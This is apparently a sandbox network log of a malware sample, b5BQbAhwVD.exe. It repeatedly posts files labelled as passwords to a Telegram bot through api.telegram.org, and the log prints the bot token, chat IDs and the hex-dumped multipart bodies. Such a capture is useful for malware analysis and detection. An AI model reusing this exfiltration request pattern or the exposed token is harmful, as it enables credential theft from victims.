2025-01-10 21:43:44 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 32 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 32 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43624,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545424,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49995	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:43:45 UTC	274	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd31eecc056063 Host: api.telegram.org Content-Length: 1090
2025-01-10 21:43:45 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 65 65 63 63 30 35 36 30 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd31eecc056063Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:43:45 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:43:45 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:43:45 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 32 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 32 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43625,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545425,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49997	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:43:46 UTC	274	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd3202163f9add Host: api.telegram.org Content-Length: 1090
2025-01-10 21:43:46 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 30 32 31 36 33 66 39 61 64 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd3202163f9addContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:43:47 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:43:47 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:43:47 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 32 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 32 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43626,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545427,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49999	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:43:48 UTC	274	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd3215538ae355 Host: api.telegram.org Content-Length: 1090
2025-01-10 21:43:48 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 31 35 35 33 38 61 65 33 35 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd3215538ae355Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:43:48 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:43:48 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:43:48 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 32 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 32 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43627,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545428,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	50001	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:43:50 UTC	274	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd3227251c8d9e Host: api.telegram.org Content-Length: 1090
2025-01-10 21:43:50 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 32 37 32 35 31 63 38 64 39 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd3227251c8d9eContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:43:50 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:43:50 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:43:50 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 32 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 33 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43628,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545430,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	50003	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:43:52 UTC	298	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd323fbd7b0627 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:43:52 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 33 66 62 64 37 62 30 36 32 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd323fbd7b0627Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:43:52 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:43:52 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:43:52 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 32 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 33 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43629,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545432,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	50005	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:43:53 UTC	274	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd325171dc5706 Host: api.telegram.org Content-Length: 1090
2025-01-10 21:43:53 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 35 31 37 31 64 63 35 37 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd325171dc5706Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:43:53 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:43:53 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:43:53 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 33 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 33 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43630,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545433,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	50007	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:43:55 UTC	274	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd3261bf4f0807 Host: api.telegram.org Content-Length: 1090
2025-01-10 21:43:55 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 36 31 62 66 34 66 30 38 30 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd3261bf4f0807Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:43:55 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:43:55 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:43:55 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 33 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43631,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545435,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	50009	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:43:56 UTC	274	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd32735dd22759 Host: api.telegram.org Content-Length: 1090
